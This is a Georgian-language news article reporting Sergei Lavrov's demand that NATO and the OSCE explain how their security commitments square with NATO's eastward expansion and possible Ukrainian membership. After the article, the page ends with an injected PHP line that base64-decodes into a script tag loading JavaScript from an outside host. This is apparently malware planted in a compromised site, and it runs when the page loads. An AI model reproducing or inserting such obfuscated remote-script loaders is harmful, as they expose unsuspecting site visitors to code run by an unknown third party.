celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრმა სერგეი ლავროვმა განაცხადა, რუსეთი უსაფრთხოებასთან დაკავშირებით ნატო-სა და ეუთო-ში ოფიციალურ მოთხოვნას გზავნის.
 
რუსეთი ნატოსგან განმარტებას ითხოვს, როგორ შეესაბამება ალიანსის ქმედებები უსაფრთხოების განმტკიცების საკითხში სხვა სახელმწიფოების უფლებებს.
 
„დღეს საგარეო საქმეთა სამინისტროს ხაზით ჩვენ კოლეგებს ალიანსისა და ეუთოს ქვეყნებში ვუგზავნით მოთხოვნას, რომლითაც დაჟინებით ვითხოვთ განმარტებას, როგორ აპირებენ ისინი ვალდებულების შესრულებას, არ გაამყარონ საკუთარი უსაფრთხოება სხვათა უსაფრთხოების ხარჯზე. თუკი არ აპირებენ, აგვიხსნან რატომ“, - განაცხადა ლავროვმა.
 
მისი თქმით, ამ ორგანიზაციების პასუხებზეა დამოკიდებული, რას შესთავაზებს მომავალში პრეზიდენტ პუტინს საგარეო საქმეთა სამინისტრო.
 
ლავროვი აცხადებს, რომ დასავლეთს სურს, უკრაინის ნატოში შეყვანა, რაც რეალურად გაანადგურებს რუსეთთან ურთიერთობებს. მისივე თქმით, მოსკოვი ამ ქმედებებს აფასებს როგორც ოფიციალური პოლიტიკური ვალდებულებების უხეშ დარღვევას, რომლებიც საკუთარ თავზე აიღეს ამერიკისა და ალიანსის წევრი ქვეყნების პრეზიდენტებმა.
 
„ყოველ ჯერზე გამოდის, რომ ხაზი, რომლის დაცვაც მათ ევალებათ, სულ უფრო მეტად მიიწევს აღმოსავლეთისკენ. ახლა ის სულ უფრო მოუახლოვდა უკრაინას. სურთ, ეს ქვეყანაც იქ შეიყვანონ. თუმცა კი, ყველასთვის გასაგებია, რომ უკრაინა არ არის მზად და ნატოს უსაფრთხოების გაძლიერებაში ვერავითარ წვლილს ვერ შეიტანს“, - განაცხადა ლავროვმა.
 
 
 
მისივე თქმით, უსაფრთხოების გარანტიებთან დაკავშირებით რუსეთის შეთავაზებაზე ალიანსს ეწოდება თავდაცვითი. თუმცა კი, ლავროვი მიიჩნევს, რომ ალიანსის ასეთად მიჩნევა რთული საკითხია.
 
„არ უნდა დაგვავიწყდეს, რომ ისინი თითქმის, სამი თვე ბომბავდნენ იუგოსლავიას, შეიჭრნენ ლიბიაში, რითაც დაარღვიეს გაეროს უშიშროების საბჭოს რეზოლუცია, ასევე, როგორ იქცეოდნენ ავღანეთში. როდესაც „ცივი ომი“ მიმდინარეობდა და და არსებობდა ბერლინის კედელი, გასაგები იყო, რომელი ტერიტორია უნდა ყოფილიყო დაცული. კედელი აღარ არის, ეუთოს ფარგლებში ჩვენ გამოვაცხადეთ სამუდამო მეგობრობა, უსაფრთხოების განუყოფლობა, სოლიდარობა, შევთანხმდით, რომ არავინ უნდა გაამყაროს თავისი უსაფრთხოება სხვათა ხარჯზე - ისინი კი განაგრძობენ ქვეყნების მიღებას“, - განაცხადა ლავროვმა.
 
939
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");